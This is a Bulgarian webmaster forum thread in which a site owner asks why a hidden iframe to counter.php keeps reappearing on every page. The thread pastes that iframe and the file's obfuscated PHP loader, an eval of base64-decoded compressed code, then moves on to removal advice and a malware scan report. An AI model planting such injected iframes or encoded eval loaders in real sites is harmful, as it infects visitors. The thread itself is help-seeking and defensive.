Постоянно ми се генерира някакъв код в страниците?

ianis-build

Active member
Здравейте,
Постоянно ми се генерира един код в дъното на всяка страница (преди </body>) и колкото и пъти да го трия, след време се появява пак.
HTML:
<iframe src="http://ianis-build.eu/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px;" height="10" width="10"></iframe>
Какво може да генерира кода?

За: Постоянно ми се генерира някакъв код в страниците?

Counter.php = php virus. Почвай да сменяш пароли за фтп и да чистиш хостинг акауннта от вредители.

Вирус е. И като гледам го имаш от доста време.

Re: Постоянно ми се генерира някакъв код в страниците?

Ето и съдържанието на въпросния файл(counter.php):
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<?php //Counter V.2.35

//Generated by server

//Do not delete

eval(gzuncompress(base64_decode('eF6lUsFqwkAU/JUeCqtQiiS1ECQHe0ikCJJt0exKCdlNFNKIYkBIvl7nJYVqnicPmbfsvDczu5vncL74mM6/1iJJ000ifvzp8ZjWA5NW+ftbkuV2n+UDYcXTq3AlsAZkoVcZl1YlkPitD/TF8OV22pW1vXwM0+qSJt/xx1hyYzXuqxNDcwDOH6nueiPRA6nIk59Xu6DR4L/VKHYoYakc71dHPnN/WfyJlkqvxqiFceg8Zf8+sX3prlD1CjgugKbz6E/80+46JaMLzWs9rkvByl3WBjXwDmZHP8eo76rQFXgN5YzlCdXOIubsYKi71Wx0jIU82RkqN9Fpgy5zYAhYFkwKEG2SwoRdmgibeIXh5AxE9+BR'))); ?>
</head>
<body>
<br>
</body>
</html>

Re: За: Постоянно ми се генерира някакъв код в страниците?

Re: За: Постоянно ми се генерира някакъв код в страниците?

Има ли програмка с която да го изчистя или просто да изтрия php файла

Смени си темата.

Здравейте 🙂 След като изчетох всичко, изписано до момента, съветът ми е само един - искайте помощ от професионалист. При условие, че не знаете как да си смените темата и да боравите с файловете на сайта ви, най-добре да не пипате. Тук има немалко хора, които ще ви предложат професионална помощ на много приемлива цена.

Посещавай периодично тук
Sucuri SiteCheck - Free Website Malware Scanner
за да ги откриеш на време тези неща.
AVG също го открива:
http://www.avgthreatlabs.com/sitereports/domain/ianis-build.eu
За премахването за съжаление не мога да помогна, само исках това да ти кажа да следиш за в бъдеше.

🙂 За темата на сайта ли става дума, аз мислех за тази в форума (да променя заглавието). Сайта е правен на чист ХТМЛ и съдържа 36 страници, които проверих и премахнах линка към counter.php от всички страници, изтрих и самия файл, изтрих ФТП акаунта и преинсталирах ПЦ-то След това смених и паролата на Ц-панела и създадох нов ФТП акаунт.
Мисля, че всичко е ОК!
Но искам да попитам дали няма някакъв начин да се сканира сайта, например с някакъв софт и да се провери за вирус, защото за в бъдеще смятам да го правя често.
Ето и проверката на гугъл -
Безопасно сърфиране
Страница за диагностика за ianis-build.eu

Какво е текущото състояние за ianis-build.eu?
Този сайт понастоящем не е посочен като подозрителен.

Какво се случи, когато Google посети този сайт?
От общо 36 страници, които тествахме на сайта през последните 90 дни, без съгласието на потребителя злонамерен софтуер бе изтеглен и инсталиран в резултат на 1 от тях. Предишното посещение на Google на сайта бе на 2013-04-20 и за последен път там бе намерено подозрително съдържание на 2013-03-31.
Злонамереният софтуер включва 103 trojan(s). Успешното заразяване доведе до средно 3 нов/и процес/а на целевия компютър.

Злонамерен софтуер е хостван на 1 домейн/а, включително inetbillde.info/.

Броят мрежи, на които този сайт е хостван, е 1, включително AS49699 (ICN).

Сайтът действал ли е като посредник, което да е довело до допълнително разпространяване на злонамерен софтуер?
През последните 90 дни ianis-build.eu не изглеждаше, че функционира като посредник за заразяването на сайтове.

На този сайт хостван ли е злонамерен софтуер?
Не, на този сайт не е хостван злонамерен софтуер през последните 90 дни.

Следващи стъпки:
Върнете се на предишната страница.
Ако сте собственикът на този уебсайт, можете да поискате той да бъде проверен чрез Google Инструменти за уеб администратори. Повече информация за процеса на проверка е налице в Помощния център за уеб администратори на Google.

За: Re: Постоянно ми се генерира някакъв код в страниците?

За: Re: Постоянно ми се генерира някакъв код в страниците?

🙂 За темата на сайта ли става дума, аз мислех за тази в форума (да променя заглавието).
Това беше наистана яко.

Да в началото не схванах идеята и за това. 😀
Всички си мислят, че сайта е с някакъв ЦМС, но той си е на чист ХТМЛ писан с композер (малко старомодничко, ама преди така съм го правил).
Мерси за съветите на всички.

Ето един инструмент за сканиране за вируси, хакове и подобните - Sucuri SiteCheck - Free Website Malware Scanner

Доста е добър, а платената му версия е на по-високо ниво... но в случая едва ли има нужда от платената версия. Безплатната е по-скоро за сверяване на часовника 🙂

Посещавай периодично тук
Sucuri SiteCheck - Free Website Malware Scanner
за да ги откриеш на време тези неща.
AVG също го открива:
http://www.avgthreatlabs.com/sitereports/domain/ianis-build.eu
Чукча писатель, чукча не читатель! 😉

Последно редактирано:

Back
Горе